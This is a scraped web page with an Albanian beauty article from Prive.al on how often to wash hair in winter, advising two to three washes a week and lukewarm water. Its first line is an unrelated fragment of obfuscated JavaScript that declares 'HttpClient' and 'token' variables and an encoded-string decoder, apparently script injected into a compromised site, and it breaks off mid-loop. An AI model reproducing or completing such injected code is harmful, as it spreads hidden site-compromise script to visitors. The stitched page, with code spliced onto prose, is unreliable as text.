;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Sa herë në javë duhet t’i lani flokët gjatë dimrit?

By

Nëse ka pjesë të trupit që moti e ndikon menjëherë, pa dyshim që janë flokët. Nuk ka shumë rëndësi nëse keni flokë të gjatë apo të shkurtër, ndryshimet e temperaturave do ti bëjnë të duken dhe ndihen ndryshe në çdo stinë.

Vera i këput dhe i than shpejt, ndërsa dimri i bën më të lagësht e të elektrizuar. Gjithsesi ndërmjet stinëve, procesi që kryeni gjithnjë është larja dhe kujdesi i vazhdueshëm për to.

Pikërisht tek larja mund të jetë edhe çelësi i mbajtjes së flokëve sa më të shëndetshëm e të balancuar në çdo kohë.

Sa herë duhet t’i lani flokët?

Ndonëse mund të ndjeni se flokët në verë janë më të thatë nga dielli i tepërt, në dimër skalpi ka tendencën të thahet më shumë.

Kjo ndodh sepse ajri është i thatë dhe i ftohtë dhe ndikon drejtpërdrejtë në shëndetin e flokëve.

Ndërsa kur jeni në ambiente brenda, ku zakonisht është ngrohtë, flokët sërish përballen me një ekstremitet tjetër temperature.

Kjo do ti lërë ata të pa hidratuar dhe aspak të shëndetshëm. Një faktor tjetër ndikues është edhe larja e tyre.

Nëse këtë gjë e bëni më shumë se 2-3 herë në javë ka shumë mundësi që ti dëmtoni flokët tuaj. Prandaj nëse e teproni me larjen e tyre do të keni flokë m të thatë dhe më pak të shëndetshëm.

Sigurisht një rol të rëndësishëm luan edhe shampo të cilën do të përdorni. Qëndroni larg shampove purifikuese dhe shumë pastruese në dimër, pasi do të ndikojnë në hidratimin e mirë të flokëve tuaj.

Është e këshillueshme që gjatë dimrit ti lani flokët me ujë të vakët, pavarësisht sa kënaqësi i jep trupit një dush i ngrohtë. /Prive.al

Artikuj të ngjashëm